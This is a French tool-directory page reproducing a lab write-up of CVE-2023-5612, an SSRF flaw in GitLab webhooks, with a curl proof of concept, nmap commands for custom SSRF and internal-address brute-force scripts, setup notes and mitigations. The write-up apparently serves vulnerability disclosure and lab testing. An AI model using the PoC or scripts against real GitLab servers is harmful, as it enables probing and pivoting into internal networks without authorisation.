Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Review.CVE-2023-5612 — Analyse via script CVE-2023-5612 | Kitploit
Outils/GitHubGitHub/topskiypavelqwertygang/review.cve-2023-5612
ReconnaissanceCartographie RéseauAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubtopskiypavelqwertygang/review.cve-2023-5612

Review.CVE-2023-5612

Analyse via script CVE-2023-5612

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
45il y a 1 anPas encore vérifié
Partager

CVE-2023-5612 – SSRF GitLab via URL de Webhook (PoC & analyse)

📌 Vue d'ensemble de la CVE

  • CVE-ID: CVE-2023-5612
  • Sévérité : Élevée (score de base CVSS : 8.1)
  • Type : Server-Side Request Forgery (SSRF)
  • Composant : Webhooks GitLab CE/EE
  • Versions affectées : GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

🧠 Description

Une vulnérabilité SSRF dans GitLab CE/EE permet à des attaquants disposant d'un accès valide en tant que Project Maintainer d'envoyer des requêtes forgées vers des services internes arbitraires via des URL de webhook malveillantes. L'exploitation peut conduire à l'analyse du réseau interne, à une fuite de métadonnées ou à un pivotement ultérieur.


✅ Conditions d'exploitation

  • L'attaquant dispose d'un accès maintainer au projet
  • GitLab ne possède pas de filtrage strict ni de validation des URL de webhook

⚙️ Étapes du PoC (manuel)

root@kitploit:~
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks

🧱 Environnement et configuration

root@kitploit:~
- Kali Linux dans une machine virtuelle déployée spécifiquement pour les tests
- Une instance vulnérable de GitLab CE lancée via Docker (port 8080)
- Dans GitLab :
- Création d'un projet de test
- Génération d'un Personal Access Token (glpat-...) avec les droits Maintainer
- Lancement d'un service HTTP minimal sur 127.0.0.1:8888 comme cible SSRF interne

🧠 Méthodologie

root@kitploit:~
- Confirmation manuelle de la vulnérabilité via curl (voir PoC)
- Création de scripts NSE personnalisés :
gitlab-ssrf.nse : vérification ciblée du SSRF
gitlab-ssrf-brute.nse : énumération automatique des adresses internes
- Tests avec nmap -d et --script-trace pour analyser le comportement de l'API et consigner les résultats
- Obtention d'une réponse 401 Unauthorized du service interne, indiquant un SSRF réussi
- Une requête réussie renverra `201 Created` ou une erreur de type `401 Unauthorized`, ce qui indique un accès SSRF.

🛠 Script NSE (déclenchement manuel)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

🧪 Script NSE (force brute des URL internes)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

📈 Conclusion

root@kitploit:~
Au cours des travaux sur la vulnérabilité **CVE-2023-5612**, un scénario d'attaque SSRF réussi a été reproduit, avec un accès aux adresses internes via l'API GitLab CE. Cela démontre à quel point il est important de limiter les capacités des webhooks et de mettre en place une validation des URL côté serveur.

🎯 Objectif atteint :

  • SSRF confirmé
  • Outillage NSE implémenté
  • Projet documenté et ouvert à la communauté

📂 Structure du dépôt

root@kitploit:~
.
├── gitlab-ssrf.nse             # Script NSE pour la vérification manuelle du SSRF
├── gitlab-ssrf-brute.nse       # Script NSE de force brute pour scanner les hôtes/ports internes
├── screenshots/                # Captures d'écran de l'exécution du PoC et de la confirmation de la vulnérabilité
└── README.md                   # Ce fichier

🖼 Captures d'écran

  • ✅ SSRF réussi avec retour d'un 401 Unauthorized
  • 📜 Logs nmap avec exécution du script
  • 📦 Ajout d'un webhook via l'API

⚠️ Atténuation

  • Mettre à niveau GitLab vers >= 16.2.7 / 16.3.4 / 16.4.1
  • Restreindre le HTTP sortant via un pare-feu egress
  • Utiliser des listes d'autorisation internes (allow-lists) pour les webhooks

🧠 Auteur et contact

Pavel Topskiy
GitHub • Analyste en sécurité, Analyste Red Team


📅 Chronologie

  • Juin 2025 : Analyse du PoC et de la vulnérabilité
  • 5 juin 2025 : Écriture du script NSE personnalisé et des tests

🔐 Avertissement

Tous les tests ont été effectués dans des environnements de laboratoire isolés sur des versions volontairement vulnérables. Ne l'utilisez pas contre des systèmes non autorisés. Respectez les principes du hacking éthique.

Télécharger l’outil